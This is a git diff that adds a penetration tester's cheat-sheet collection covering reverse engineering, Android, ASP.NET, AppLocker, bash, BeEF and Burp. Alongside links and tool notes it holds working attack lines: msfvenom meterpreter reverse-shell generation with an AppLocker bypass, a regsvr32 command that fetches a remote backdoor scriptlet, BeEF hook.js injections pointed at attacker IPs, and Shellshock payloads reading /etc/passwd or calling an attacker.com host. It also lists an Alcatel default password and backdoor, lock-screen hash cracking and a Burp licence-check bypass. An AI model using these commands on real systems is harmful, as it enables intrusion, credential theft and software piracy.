diff --git a/Cheat Sheet/RE b/Cheat Sheet/RE
new file mode 100644
index 0000000..1aeb3b9
--- /dev/null
+++ b/Cheat Sheet/RE	
@@ -0,0 +1,141 @@
+# reverse
+
+# p complete
+http://wiki.yobi.be/wiki/Reverse-Engineering
+
+# compiler explorer
+http://gcc.godbolt.org/
+
+# system calls
+strace -e trace=open -p $PID
+strace -f -s3000 -e trace=execve
+
+# dynamic library calls and signals
+ltrace
+
+# syscall dymanic tracer for Linux
+https://github.com/iovisor/ply
+
+# reversing network protocols
+https://github.com/netzob/netzob
+
+# static analysis tool for binaries. ELF/PE, x86/x64, IL RREIL, DBI PIN
+https://bitbucket.org/mihaila/bindead/overview
+
+# symbolic execution
+https://github.com/trailofbits/manticore
+
+# python for reverse engineering
+http://pythonarsenal.erpscan.com/
+
+# PE format
+# windows executable walkthrough
+https://code.google.com/p/corkami/wiki/PE?show=content
+
+# jumps
+Mnemonic        Condition tested  Description  
+
+jo              OF = 1            overflow 
+jno             OF = 0            not overflow 
+jc, jb, jnae    CF = 1            carry / below / not above nor equal
+jnc, jae, jnb   CF = 0            not carry / above or equal / not below
+je, jz          ZF = 1            equal / zero
+jne, jnz        ZF = 0            not equal / not zero
+jbe, jna        CF or ZF = 1      below or equal / not above
+ja, jnbe        CF or ZF = 0      above / not below or equal
+js              SF = 1            sign 
+jns             SF = 0            not sign 
+jp, jpe         PF = 1            parity / parity even 
+jnp, jpo        PF = 0            not parity / parity odd 
+jl, jnge        SF xor OF = 1     less / not greater nor equal
+jge, jnl        SF xor OF = 0     greater or equal / not less
+jle, jng    (SF xor OF) or ZF = 1 less or equal / not greater
+jg, jnle    (SF xor OF) or ZF = 0 greater / not less nor equal 
+
+# timeless
+qira
+rr-project
+Reven Axion https://www.youtube.com/watch?v=5WNRplDPf5s
+
+# emulate asm with unicorn (http://idabook.com/ctf/pwn2win_botnet.txt)
+def hook_syscall(mu, user_data):
+   mu.emu_stop()
+
+def do_milkshake(milkshake):
+   #milkshake is the fleebot provided machine code
+   mu = Uc(UC_ARCH_X86, UC_MODE_64)
+   mu.mem_map(0x1000000, 4096)
+   mu.mem_write(0x1000000, milkshake)
+   mu.reg_write(UC_X86_REG_RSP, 0x1000000 + 4096 - 16)
+   mu.hook_add(UC_HOOK_INSN, hook_syscall, None, 1, 0, UC_X86_INS_SYSCALL)
+   mu.emu_start(0x1000000, 0x1000000 + len(milkshake))
+   rsi = mu.reg_read(UC_X86_REG_RSI)
+   rdx = mu.reg_read(UC_X86_REG_RDX)
+   magic = mu.mem_read(rsi, rdx)
+   return magic
+
+# qa-based disassembly viewer based on radare2
+https://github.com/sapir/sonare
+
+# registers (AL, BL etc.)
+http://i.stack.imgur.com/rzuaP.jpg
+
+================ rax (64 bits)
+        ======== eax (32 bits)
+            ====  ax (16 bits)
+            ==    ah (8 bits)
+              ==  al (8 bits)
+
+# stack layout
+http://eli.thegreenplace.net/2011/09/06/stack-frame-layout-on-x86-64/
+http://eli.thegreenplace.net/2011/02/04/where-the-top-of-the-stack-is-on-x86/
+
+# 101
+system call number passed in the EAX register
+
+x86 args
+1   2   3
+ebx ecx edx
+
+x64 args
+1    2    3   4   5  6
+rdi  rsi  rdx rcx r8 r9
+argc argv
+
+see http://wiki.osdev.org/Calling_Conventions
+
+eax=1, rdi=1: write to stdout
+eax=0, rdi=0: read from stdin
+
+[corelan] The CPU’s general purpose registers (Intel, x86) are :
+EAX : accumulator : used for performing calculations, and used to store return values from function calls. Basic operations such as add, subtract, compare use this general-purpose register
+EBX : base (does not have anything to do with base pointer). It has no general purpose and can be used to store data.
+ECX : counter : used for iterations. ECX counts downward.
+EDX : data : this is an extension of the EAX register. It allows for more complex calculations (multiply, divide) by allowing extra data to be stored to facilitate those calculations.
+ESP : stack pointer
+EBP : base pointer
+ESI : source index : holds location of input data
+EDI : destination index  : points to location of where result of data operation is stored
+EIP : instruction pointer
+
+lea eax,[ebp-0x4] // load effective address: eax recupere l'address
+
+mov BYTE PTR [ebx], 2   ; Move 2 into the single byte at the address stored in EBX.
+mov WORD PTR [ebx], 2   ; Move the 16-bit integer representation of 2 into the 2 bytes starting at the address in EBX.
+mov DWORD PTR [ebx], 2      ; Move the 32-bit integer representation of 2 into the 4 bytes starting at the address in EBX. 
+
+* prologue
+push ebp // increment esp de 4 bytes
+move ebp, esp // ebp prend la valeur de esp
+sub esp, 0x8
+
+* epilogue
+mov esp, ebp// esp prend la valeur de ebp
+pop ebp
+ret
+//ou 
+leave
+ret
+
+# arm 101
+https://azeria-labs.com/writing-arm-assembly-part-1/
diff --git a/Cheat Sheet/README.md b/Cheat Sheet/README.md
new file mode 100644
index 0000000..c4a43ff
--- /dev/null
+++ b/Cheat Sheet/README.md	
@@ -0,0 +1 @@
+Cheat Sheet
diff --git a/Cheat Sheet/Responder b/Cheat Sheet/Responder
new file mode 100644
index 0000000..389e676
--- /dev/null
+++ b/Cheat Sheet/Responder	
@@ -0,0 +1,12 @@
+# Responder
+
+https://github.com/SpiderLabs/Responder
+http://g-laurent.blogspot.com.au/
+http://blog.spiderlabs.com/2012/10/introducing-responder-10.html
+http://blog.spiderlabs.com/2013/01/owning-windows-networks-with-responder-17.html
+http://blog.spiderlabs.com/2013/02/owning-windows-network-with-responder-part-2.html
+http://blog.spiderlabs.com/2014/02/responder-20-owning-windows-networks-part-3.html
+
+# inject beef
+HTMLToServe = <html><head><script src="http://192.168.11.49:3000/hook.js" type="text/javascript"></script></head><body></body></html>
+also read: https://www.christophertruncer.com/getting-hooked-responder-beef/
diff --git a/Cheat Sheet/abn b/Cheat Sheet/abn
new file mode 100644
index 0000000..0a85cf8
--- /dev/null
+++ b/Cheat Sheet/abn	
@@ -0,0 +1,3 @@
+# abn
+
+test ABN: 53 004 085 616
diff --git a/Cheat Sheet/aix b/Cheat Sheet/aix
new file mode 100644
index 0000000..ba51075
--- /dev/null
+++ b/Cheat Sheet/aix	
@@ -0,0 +1,4 @@
+# aix
+
+https://www.giac.org/paper/gpen/6684/aix-penetration-testers/125890
+https://thevivi.net/2017/03/19/aix-for-penetration-testers/
diff --git a/Cheat Sheet/alcatel b/Cheat Sheet/alcatel
new file mode 100644
index 0000000..eec7271
--- /dev/null
+++ b/Cheat Sheet/alcatel	
@@ -0,0 +1,9 @@
+# alcatel
+
+# default password
+LeTacLa
+
+# backdoor
+rsh <ip> -l mtcl id
+then
+rsh localhost -l swinst id
diff --git a/Cheat Sheet/amazon b/Cheat Sheet/amazon
new file mode 100644
index 0000000..ae1360f
--- /dev/null
+++ b/Cheat Sheet/amazon	
@@ -0,0 +1,6 @@
+# aws / amazon / s3 / ec2
+
+http://stacksmashing.net/2010/11/15/cracking-in-the-cloud-amazons-new-ec2-gpu-instances/
+http://wblinks.com/notes/aws-tips-i-wish-id-known-before-i-started/
+https://rhinosecuritylabs.com/penetration-testing/penetration-testing-aws-storage/
+https://github.com/jordanpotti/AWSBucketDump
diff --git a/Cheat Sheet/android b/Cheat Sheet/android
new file mode 100644
index 0000000..9393d03
--- /dev/null
+++ b/Cheat Sheet/android	
@@ -0,0 +1,113 @@
+# android
+
+# quick analysis
+https://github.com/1N3/ReverseAPK
+
+# good reference
+https://github.com/tanprathan/MobileApp-Pentest-Cheatsheet/
+https://www.owasp.org/index.php/Projects/OWASP_Mobile_Security_Project_-_Top_Ten_Mobile_Risks
+
+# great blog about android security (michael)
+http://nelenkov.blogspot.com.au/2013/09/using-sim-card-as-secure-element.html
+
+# intro android security DC19
+http://www.youtube.com/watch?v=GoMgK3om8Vo
+http://slandail.net/step-by-step-guide-to-decompiling-android-apps/
+
+# static analysis
+smalisca http://nullsecurity.net/tools/scanner.html
+APKAnalyzer (http://developer.sonymobile.com/2012/04/13/powerful-tool-to-analyse-your-apks-now-released-open-source/)
+
+# android webviews best practice
+https://labs.mwrinfosecurity.com/blog/2012/04/23/adventures-with-android-webviews/
+http://www.droidsec.org/news/2014/02/26/on-the-webview-addjsif-saga.html
+
+# debug ala gdb (not tested)
+https://appsec-labs.com/AppUse
+10:39 <michael> https://www.owasp.org/images/d/d6/OWASP_IL_2013_10_Erez_Metula_The_ReFrameworker_Android_runtime_manipulator.pdf
+
+# HIP talk
+http://www.youtube.com/watch?v=Tv5bmlPXyFU
+http://kaiyou.fr/files/2013/06/main.pdf
+https://github.com/sysdream/fino
+https://github.com/sysdream/gadget
+https://github.com/sysdream/gadget-client
+
+# http://blog.sglan/2013/05/02/dump-files-as-debuggable-app.html
+quick test:
+$ adb shell
+run-as com.boganbank.gr8app ls /data/data/com.boganbank.gr8app
+
+# local root on 4.4.2
+http://blog.cassidiancybersecurity.com/post/2014/06/Android-4.4.3%2C-or-fixing-an-old-local-root
+
+# tool which can extract and re-package backup files created with 'adb backup' so they an be restored with 'adb restore'
+https://github.com/nelenkov/android-backup-extractor
+
+# help with analyzing inter-app communication but requires to upload apk (so not suitable if app isn't public yet)
+http://comdroid.org
+
+# dex2jar replacements
+https://github.com/google/enjarify
+
+# sign apk
+* generate your own selfsigned cert
+keytool -genkey -v -keystore mykey.keystore -alias alias_name -keyalg RSA -keysize 2048 -validity 10000
+
+* use android ks
+jarsigner -sigalg SHA1withRSA -digestalg SHA1 -keystore ~/.android/debug.keystore com.blah.apk androiddebugkey
+password: android
+
+* check signed cert
+openssl pkcs7 -inform DER -in META-INF/CERT.RSA -text -print_certs
+keytool -printcert -file CERT.RSA
+
+# gul
+http://www.securityaegis.com/notes-on-setting-up-an-android-pentest-lab/
+* Exemple
+E:\Tools\Android-sdk\tools\emulator.exe -avd Android_2.1_update_1 -http-proxy 1.2.3.4:8080 -scale 0.7
+
+* Faire fonctionner l'émulateur avec un proxy
+% Depuis le console :
+% tools\emulator.exe -avd <AVD> -http-proxy <ip:port>
+% Évidemment depuis le SDK Manager, ca ne fonctionne pas...
+
+% Depuis l'émulateur :
+% settings > Wireless & networks > Mobile network > Access Point Names > TelKila
+% > Proxy / Port
+
+* Interesting links
+http://code.google.com/p/android-apktool/wiki/FrameworkFiles
+http://code.google.com/p/android-apktool/wiki/ReportingIssues
+http://groups.google.com/group/apktool?pli=1
+http://stackoverflow.com/questions/28380/proxy-with-android-emulator
+http://developer.android.com/guide/developing/devices/emulator.html
+
+# genymotion
+burp: 10.0.3.2:8082
+adb push /opt/m/share/dist/burp_cacert.cer /sdcard/burp.cer
+
+install Google Play Services
+https://github.com/codepath/android_guides/wiki/Genymotion-2.0-Emulators-with-Google-Play-support
+
+# ida plugins
+https://github.com/techbliss/ADB_Helper_QT_Super_version
+https://www.youtube.com/watch?v=j6EwCC4mxNQ
+
+# lock screen (password/PINs)
+password.key, locksettings.db and device_policies.xml
+* android 5.x https://hashcat.net/forum/thread-2202-page-5.html
+hashcat -m 110 $(cat password.key|tr A-Z a-z|cut -b -40):$(printf "%x" $(sqlite3 locksettings.db "select value from locksettings where name='lockscreen.password_salt'"))
+* android < 5.x https://hashcat.net/forum/thread-2202.html
+hashcat -m 5800 
+
+# hooking (introspy)
+https://www.sensepost.com/blog/2016/android-hooking-with-introspy/
+
+# patch apk
+adb uninstall com.example.Test
+rm -f Test-patched.apk
+apktool b Test-22/ -o Test-patched.apk
+jarsigner -sigalg SHA1withRSA -digestalg SHA1 -keystore ~/.android/debug.keystore -storepass android Test-patched.apk androiddebugkey
+adb install Test-patched.apk
+
diff --git a/Cheat Sheet/apache2 b/Cheat Sheet/apache2
new file mode 100644
index 0000000..64b5f05
--- /dev/null
+++ b/Cheat Sheet/apache2	
@@ -0,0 +1,18 @@
+# apache2
+
+# add below line to httpd.conf to suppress the statup warning "Could not reliably determine the server's fully qualified domain name"
+ServerName mysrvname
+
+# hide version info
+ServerTokens Prod
+ServerSignature Off
+=> et consulter la kb de HSC (eg. cvs)
+
+# suEXEC read file bypass
+http://packetstormsecurity.com/files/122738/Apache-suEXEC-Privilege-Escalation-Information-Disclosure.html
+
+# list enabled modules
+apache2ctl -M
+
+# create let's encrypt ssl server certs
+certbot --apache
diff --git a/Cheat Sheet/applocker b/Cheat Sheet/applocker
new file mode 100644
index 0000000..cc9bd9b
--- /dev/null
+++ b/Cheat Sheet/applocker	
@@ -0,0 +1,34 @@
+# applocker
+
+# https://gist.github.com/hugsy/e5c4ce99cd7821744f95
+# Trick to run arbitrary command when code execution policy is enforced (AppLocker or equivalent). Works on Win98 (lol) and up - tested on 7/8
+rundll32 .\RunMe.dll,RunCommand cmd.exe /k whoami
+
+https://www.attackdebris.com/?p=143
+rundll32 meterpreter.dll, blah
+
+# bypassing application whitelisting
+https://github.com/GreatSCT/GreatSCT
+https://github.com/subTee/ApplicationWhitelistBypassTechniques/blob/master/TheList.txt
+https://khr0x40sh.wordpress.com/2015/05/27/whitelist-evasion-revisited/
+
+* InstallUtil.exe worked for me against Bit9 v7.0.2 build 1492
+./msfvenom -f csharp -p windows/meterpreter/reverse_tcp LPORT=1234 LHOST=10.75.3.20 > /tmp/csharp.cs
+python InstallUtil.py --cs_file /tmp/csharp.cs --exe_file /opt/m/share/csharp.exe
+C:\Windows\Microsoft.NET\Framework\v2.0.50727\InstallUtil.exe /logfile= /LogToConsole=false /U csharp.exe
+
+# good list of possible techniques
+http://en.wooyun.io/2016/01/28/Bypass-Windows-AppLocker.html
+
+# xls opening a cmd via VBA
+http://blog.didierstevens.com/2016/02/10/create-your-own-cmd-xls/
+
+# C:\Windows\Tracing
+https://twitter.com/subTee/status/681604454051778561
+
+# regsvr32
+http://subt0x10.blogspot.com.au/2016/04/bypass-application-whitelisting-script.html
+regsvr32 /s /n /u /i:https://gist.githubusercontent.com/subTee/24c7d8e1ff0f5602092f58cbb3f7d302/raw/39138e17a3e382da70ab336cbd29e7c37b16d22b/Backdoor-Minimalist.sct … scrobj.dll https://twitter.com/aionescu/status/723266342829182976
+
+# lol
+does not protect against 16-bit DOS binaries
diff --git a/Cheat Sheet/apt b/Cheat Sheet/apt
new file mode 100644
index 0000000..9817cde
--- /dev/null
+++ b/Cheat Sheet/apt	
@@ -0,0 +1,3 @@
+# apt
+
+https://github.com/kbandla/APTnotes.git
diff --git a/Cheat Sheet/asp.net b/Cheat Sheet/asp.net
new file mode 100644
index 0000000..b8a3a89
--- /dev/null
+++ b/Cheat Sheet/asp.net	
@@ -0,0 +1,87 @@
+# asp.net
+
+# howto decrypt encrypted password from web.config files
+https://www.netspi.com/blog/entryid/215/decrypting-iis-passwords-to-break-out-of-the-dmz-part-1
+copy "c:\inetpub\wwwroot\MyApp\web.config"  c:\temp
+C:\Windows\Microsoft.NET\Framework\v2.0.50727\aspnet_regiis.exe -pdf "connectionStrings" C:\temp
+
+# the "if IsCallBack()" mistake
+__EVENTTARGET=&__EVENTARGUMENT=
+
+# .net decompiler
+dnSpy
+ILSpy
+http://www.telerik.com/download/justdecompile
+reflector (but need license)
+
+# .net assembly editor
+https://github.com/sailro/Reflexil
+
+# .net deobfuscator and unpacker
+https://github.com/0xd4d/de4dot 
+
+# .net deserialization
+https://blog.scrt.ch/2016/05/12/net-serialiception/
+
+# padding oracle
+http://eglasius.blogspot.fr/2010/09/aspnet-padding-oracle-how-it-relates-to.html (intro)
+papers/PaddingOraclesEverywhereEkoparty2010.pdf (original research)
+
+http://blog.mindedsecurity.com/2010/09/investigating-net-padding-oracle.html
+http://blog.mindedsecurity.com/2010/10/breaking-net-encryption-with-or-without.html
+
+http://blog.gdssecurity.com/labs/2010/9/14/automated-padding-oracle-attacks-with-padbuster.html
+http://blog.gdssecurity.com/labs/2010/10/4/padbuster-v03-and-the-net-padding-oracle-attack.html
+
+http://www.troyhunt.com/2010/09/fear-uncertainty-and-and-padding-oracle.html
+
+http://www.skullsecurity.org/blog/2013/padding-oracle-attacks-in-depth
+
+* tools
+PadBuster from gdssecurity
+http://netifera.com/research/ poet (not specific to asp.net)
+https://github.com/mwielgoszewski/python-paddingoracle
+https://github.com/escbar/pypadbuster
+https://github.com/szdavid92/padex
+
+Tom N does it with old padbuster and webconfig bruter
+
+the tool from fedon (mindedsecurity)
+perl padBusterdotnet.pl "http://172.16.37.137/SpamConsole/ScriptResource.axd?d=b9fx9D7i7Q3rV284cXCY7YX_QsG3ct3g43bFuFbYQIeCbW487OvJcTX54T2pI0BOf1-emeM2_C9O2MjMAgpFnQ2" b9fx9D7i7Q3rV284cXCY7YX_QsG3ct3g43bFuFbYQIeCbW487OvJcTX54T2pI0BOf1-emeM2_C9O2MjMAgpFnQ2 16 -plaintext "|||~/web.config"
+Start with -superverbose, and check SSL errors, eventually add the following env var:
+export PERL_LWP_SSL_VERIFY_HOSTNAME=0
+
+https://github.com/nccgroup/dotnetpaddingoracle
+
+# filetypes
+Web.Config # a la racine du website
+.aspx
+.asmx
+.ascx # controls
+
+# infoleak
+instant .net stack trace, ask for |.aspx
+
+# decode viewstate
+viewstate hacker
+
+# support / life cycle
+http://support.microsoft.com/kb/2696944 # tl;dr .net 2.0 SP2 dies when 2008 R2 will be no longer supported
+http://support.microsoft.com/lifecycle/?c2=548
+http://blogs.msdn.com/b/jamesche/archive/2007/09/25/asp-net-version-madness.aspx # since .net 3.5 sits on top of 2.0, after installing 3.5 you still have X-AspNet-Version: 2.0.50727
+
+# tilde
+http://1.2.3.4/*~1*/.aspx -> 404 -> likely vuln
+http://1.2.3.4/z*~1*/.aspx -> 400 or 200 or != than 404 -> no such resource
+http://1.2.3.4/a*~1*/.aspx -> 404 -> found first letter
+...
+http://1.2.3.4/aspnet~1/.aspx -> 404 -> found aspnet_client
+
+# local privesc .NET remoting CVE-2014-1806 and CVE-2014-4149 
+http://tyranidslair.blogspot.co.uk/2014/11/stupid-is-as-stupid-does-when-it-comes.html (https://github.com/tyranid/ExploitRemotingService)
+
+# xss via unsigned viewstate
+https://www.trustwave.com/Resources/Security-Advisories/Advisories/TWSL2010-001/?fid=3765
+
+# error logging
+/elmah /elmah.axd/
diff --git a/Cheat Sheet/awesome b/Cheat Sheet/awesome
new file mode 100644
index 0000000..60e1149
--- /dev/null
+++ b/Cheat Sheet/awesome	
@@ -0,0 +1,4 @@
+# awesome lists
+
+https://github.com/sindresorhus/awesome
+https://github.com/Hack-with-Github/Awesome-Hacking
diff --git a/Cheat Sheet/axis2 b/Cheat Sheet/axis2
new file mode 100644
index 0000000..0e9e52d
--- /dev/null
+++ b/Cheat Sheet/axis2	
@@ -0,0 +1,18 @@
+# axis2
+
+# prereq
+export AXIS2_HOME=/path/to/axis2/axis2-1.4.1
+export AXIS2C_HOME=/path/to/axis2/axis2c-bin-1.5.0-linux
+export LD_LIBRARY_PATH=$LD_LIBRARY_PATH:${AXIS2C_HOME}/lib
+export CLASSPATH=$(ls $AXIS2_HOME/lib/*.jar | tr '\n' ':')
+
+# WSDL2C.sh -d adb -u -uri bla.wsdl
+
+# SAP BusinessObjects dswsbobje fail
+http://spl0it.org/files/talks/basc10/demo.txt
+
+# XML entity
+Old Axis2 installation are vulnerable to XML Entity injection stuff BUT you must set the content type to "application/xml"
+
+# see nikto db
+@AXIS2=/ /axis2/ /imcws/ /WebServiceImpl/ /dswsbobje/ /ws/  
diff --git a/Cheat Sheet/backdoors b/Cheat Sheet/backdoors
new file mode 100644
index 0000000..0c426e2
--- /dev/null
+++ b/Cheat Sheet/backdoors	
@@ -0,0 +1,5 @@
+# backdoors
+
+# prism
+https://github.com/andreafabrizi/prism.git
+trigger a TCP reverse connect by sending a ICMP packet to victim
diff --git a/Cheat Sheet/bash b/Cheat Sheet/bash
new file mode 100644
index 0000000..2be000d
--- /dev/null
+++ b/Cheat Sheet/bash	
@@ -0,0 +1,55 @@
+# bash
+
+# pitfalls
+http://bash.cumulonim.biz/BashPitfalls.html
+
+# shellshock/bashbug CVE-2014-6271
+- http://en.wikipedia.org/wiki/Shellshock_%28software_bug%29
+- https://shellshocker.net/
+- https://securityblog.redhat.com/2014/09/24/bash-specially-crafted-environment-variables-code-injection-attack/
+- http://lcamtuf.blogspot.com.es/2014/09/quick-notes-about-bash-bug-its-impact.html
+- http://www.dwheeler.com/essays/shellshock.html#timeline
+This means that web apps written in languages such as PHP, Python, C++, or Java, are likely to be vulnerable if they ever use libcalls such as popen() or system(), all of which are backed by calls to /bin/sh -c '...'.
+There is also some added web-level exposure through #!/bin/sh CGI scripts, <!--#exec cmd="..."> calls in SSI, and possibly more exotic vectors such as mod_ext_filter.
+For the same reason, userland DHCP clients that invoke configuration scripts and use variables to pass down config details are at risk when exposed to rogue servers (e.g., on open wifi).
+Finally, there is some exposure for environments that use restricted SSH shells (possibly including Git) or restricted sudo commands, but the security of such approaches is typically fairly modest to begin with.
+
+* detection
+https://github.com/hannob/bashcheck
+https://github.com/mubix/shellshocker-pocs
+
+() { :;};echo;echo blah;/bin/ls
+
+http-shellshock.nse:
+() { :;}; echo; echo blah // in User-Agent, Referrer, Cookie, payload: payload and custom header
+nikto_shellshock.plugin:
+() { _; } >_[$($())] { echo Nikto-Added-CVE-2014-6278: true; echo;echo; }
+() { :; }; echo Nikto-Added-CVE-2014-6271: true;echo;echo;
+
++ snippets
+env x='() { :;}; echo vuln' bash -c "thiscommanddoesntexist"
+ssh -o 'rsaauthentication yes’ 192.168.1.1 '() { ignored; }; id'
+User-Agent: () { :;}; ping bbug.d2t.attacker.com
+
+* http cgi
+curl -A '() { :;};echo;/bin/cat /etc/passwd' http://192.168.0.1/poc.cgi
+curl -A '() { :;};/bin/cat /etc/passwd>dumped_file' http://192.168.0.1/poc.cgi # if STDOUT doesnt work
+
+* DHCP
+https://www.trustedsec.com/september-2014/shellshock-dhcp-rce-proof-concept/
+
+* VMware Fusion
+LANG='() { :;}; touch /tmp/it_worked' '/Applications/VMware Fusion.app/Contents/Library/Open VMware Fusion Services'
+or
+https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/osx/local/vmware_bash_function_root.rb
+
+Mac OS X Remote Login
+Cisco NX-OS
+
+* DoS
+Cookie: () { oops # will generate error message in log
+
+* Incomplete Patch by taviso (patch only prevents RCE)
+http://www.openwall.com/lists/oss-security/2014/09/24/40
+Ubuntu/Fedora are still vuln: `env X='() { (a)=>\' bash -c "echo echo vuln"; [[ "$(cat echo)" == "vuln" ]] && echo "still vulnerable :("`
+
diff --git a/Cheat Sheet/beef b/Cheat Sheet/beef
new file mode 100644
index 0000000..4b56524
--- /dev/null
+++ b/Cheat Sheet/beef	
@@ -0,0 +1,11 @@
+# beef
+
+# run
+./beef -x
+
+# rest api
+curl -v 'http://127.0.0.1:3000/api/hooks/?token=df0bc70f0a9fdfff5d4a6dfcc93fed734cd480e7'
+
+# hook via xss
+<script type=text/javascript src=http://6.6.6.6:3000/hook.js></script>
+
diff --git a/Cheat Sheet/bigip b/Cheat Sheet/bigip
new file mode 100644
index 0000000..bcc0991
--- /dev/null
+++ b/Cheat Sheet/bigip	
@@ -0,0 +1,10 @@
+# bigip f5
+
+# cookie internal IP deobfuscation
+http://blog.whitehatsec.com/f5-networks-big-ip-cookie-decoded/
+http://www.tylerkrpata.com/2009/06/decode-f5-bigip-cookie-in-one-line-of.html
+import socket, struct
+cookie = "673059850.20480.0000"
+ip, port, _ = cookie.split(".")
+print "ip =", socket.inet_ntoa(struct.pack('<L', int(ip)))
+print "port =", socket.htons(int(port))
diff --git a/Cheat Sheet/bind b/Cheat Sheet/bind
new file mode 100644
index 0000000..75cd691
--- /dev/null
+++ b/Cheat Sheet/bind	
@@ -0,0 +1,7 @@
+# bind
+
+# 953/tcp
+listen on 953/tcp for commands (e.g. rmdc)
+
+# CVE-2015-5477
+https://raw.githubusercontent.com/robertdavidgraham/cve-2015-5477/master/tkill.c
diff --git a/Cheat Sheet/bitcoin b/Cheat Sheet/bitcoin
new file mode 100644
index 0000000..f4bfee3
--- /dev/null
+++ b/Cheat Sheet/bitcoin	
@@ -0,0 +1,4 @@
+# bitcoin
+
+https://www.youtube.com/watch?v=Lx9zgZCMqXE
+http://www.michaelnielsen.org/ddi/how-the-bitcoin-protocol-actually-works/
diff --git a/Cheat Sheet/blackarch b/Cheat Sheet/blackarch
new file mode 100644
index 0000000..504a534
--- /dev/null
+++ b/Cheat Sheet/blackarch	
@@ -0,0 +1,123 @@
+# password sniffer tools
+
+* poisoning
+netcommander
+
+* creds
+PCredz
+creds.py (FTP/POP/IMAP/HTTP/IRC)
+phoss (HTTP/FTP/LDAP/Telnet/IMAP4/VNC/POP3) but segfaults (1999)
+
+* ssl
+ssldump
+sslsniff
+
+* http
+CapTipper (https://github.com/omriher/CapTipper.git)
+katsnoop (http basic only)
+httpsniff (save files locally)
+
+* starttls
+starttls-mitm
+
+* recon
+inguma
+darkbing
+gggooglescan
+seat
+dhcpig
+hasere (vhosts using google & bing)
+allthevhosts (vhost disco)
+googlesub
+quickrecon
+ripdc
+
+* patator
+mssqlscan
+rlogin-scanner
+dns2geoip
+dnsspider
+dripper
+basedomainname
+dnspredict
+fernmelder
+subbrute
+ftp-scanner
+webrute
+dirs3arch
+snmpscan
+dirscanner
+fgscanner
+freaking-simple-fuzzer
+
+* privesc
+fsnoop
+climber (linux)
+linenum
+
+* active directory
+ldapenum (Enumerate domain controllers using LDAP)
+sambascan
+enum-shares
+nmbscan
+nbtool
+passhunt
+
+* webapp fp
+wig
+vbrute (virtual host bf)
+mwebfp
+cansina
+whatweb
+blindelephant
+web-sorrow
+wappalyzer
+
+* webapp vuln scanner
+cmsmap
+secscan
+uniscan (lfi/rfi/rce)
+rawr
+webpwn3r
+eazy
+
+* wordpress
+vane
+flunym0us
+
+* drupal
+dpscan
+
+* xss
+xssya
+
+* vuln scanners
+x-scan
+paranoic
+
+* ssl scanner
+athena-ssl-scanner
+sslmap
+
+* ids/ips
+pytbull
+idswakeup
+
+* cisco
+cisco-scanner
+ocs (test default creds)
+cisco-auditing-tool
+cisco-torch
+
+* heartbleed
+hbad
+
+* proxy
+proxyscan (port scan thru proxy)
+
+* smtp
+smtptx
+relay-scanner
+
+* shellshock
+shocker
diff --git a/Cheat Sheet/breaches b/Cheat Sheet/breaches
new file mode 100644
index 0000000..af453a5
--- /dev/null
+++ b/Cheat Sheet/breaches	
@@ -0,0 +1,8 @@
+# top hacks / breaches
+
+http://quietlydreaming.wumpy.xyz/qd.txt (https://www.reddit.com/r/netsec/comments/582ix2/one_of_my_lifelong_work_hobbies_an_early_history/)
+https://docs.google.com/spreadsheets/d/1xZPAw1uCdLqDz8F_Vz57DRvCNJTcCnPgtG7P-yeloUc/edit#gid=1 owasp Web Hacking Incident Database (WHID)
+
+# 2013
+https://blog.whitehatsec.com/top-10-web-hacking-techniques-2013/
+http://hackmageddon.com/2013/12/30/2013-top-20-breaches/
diff --git a/Cheat Sheet/burp b/Cheat Sheet/burp
new file mode 100644
index 0000000..55bd27a
--- /dev/null
+++ b/Cheat Sheet/burp	
@@ -0,0 +1,32 @@
+# burp
+
+http://skora.net/news/24-itsec-projects/26-the-burp-sessionauth-extension
+
+# plugins
+* xss
+https://github.com/nVisium/xssValidator
+
+* sqlmap plugin and others
+http://code.google.com/p/gason/
+
+* generates sitemap using wayback machine
+https://github.com/k4ch0w/PwnBack
+
+# compare
+http://blog.secureideas.com/2013/08/comparing-authorization-levels-with.html
+
+# java serialisation
+Attacking java serialisation (java thick clients / applets -> java web service): DSer / BurpDSer plugin for burp
+
+# extensions
+www.burpextensions.com
+https://pro.portswigger.net/bappstore/
+https://github.com/nccgroup/ has a lot of burp extensions
+
+# license check bypass
+copy ~/.java/.userPrefs/prefs.xml and provide same account username
+with: java -Duser.name=john -jar burpsuite_pro_v1.5.x.jar (worked with 1.5.17)
+
+# handshake alert: unrecognized_name
+stems from an update in Java 7, where Server Name Indication (SNI) support was enabled by default.
+fix: java -Djsse.enableSNIExtension=false -jar burpsuiteX.jar
diff --git a/Cheat Sheet/burst b/Cheat Sheet/burst
new file mode 100644
index 0000000..d34f816
--- /dev/null
+++ b/Cheat Sheet/burst	
@@ -0,0 +1,93 @@
+# burst
+
+# filter out uninteresting requests
+ru_forward_blah = (lambda x: not re.search(r'/jsDBGet\.aspx$', x.path), "f")
+ru_forward_blah = (lambda x: re.search(r'/(?:agentMessaging.aspx|LogUser.aspx)$', x.path), "f")
+p(rules=(ru_bypass_ssl, ru_forward_blah,)
+
+# requetes compressees en deflate (ya l'option dans burp)
+Content-Encoding: deflate
+
+ecrire une fonction dans abrupt
+def blah(r):
+  r.remove_header('Content-Encoding')
+  r.update_content_length()
+  return r
+
+p(pre_func = blah)
+
+# changing default configuration
+conf
+conf.proxy = 'http://127.0.0.1:8083/'
+conf.port = 8082
+
+conf.save()
+
+# scripting
+* in console
+ss('kpop')
+get_req = history[-2]
+post_req = history[-1]
+save()
+
+* in script
+from burst.all import *
+
+switch_session('kpop')
+get_req.url += '&debug=true'
+get_req()
+post_req.content = post_req.raw_content = urllib.urlencode({'data': serial_b64})
+post_req.update_content_length()
+print('Request:\n%s' % post_req)
+post_req()
+print('Response:\n%s' % post_req.response)
+
+or using inject():
+rs = i(post_req, to='data', payloads=[serial_b64,])
+print('Request:\n%s' % rs[0])
+rs()
+print('Response:\n%s' % rs[0].response)
+
+# mitm
+
+import re
+def pre(r):
+  for h in ['accept-encoding', 'if-none-match', 'if-modified-since']:
+    r.remove_header(h)
+  return r
+
+def post(r):
+
+  if 'text/html' in ''.join(r.get_header('Content-Type')):
+
+    def blah(m):
+      #mark = r.request.hostname.lower()
+      #if not re.match('[a-z.]+$', mark):
+      #  mark = 'na'
+      #return '</title><img src="http://%s.test.d2t.attacker.com/no.ico" alt="" style="width:0px; height:0px"><img src="http://192.168.122.1//a//b.ico" alt="" style="width:0px; height:0px">' % mark
+      return '</title><script type="text/javascript" src="http://192.168.122.1:3000/hook.js"></script>'
+      #return '</title><img src="http://192.168.122.1/exchowa" alt="" style="width:0px; height:0px">'
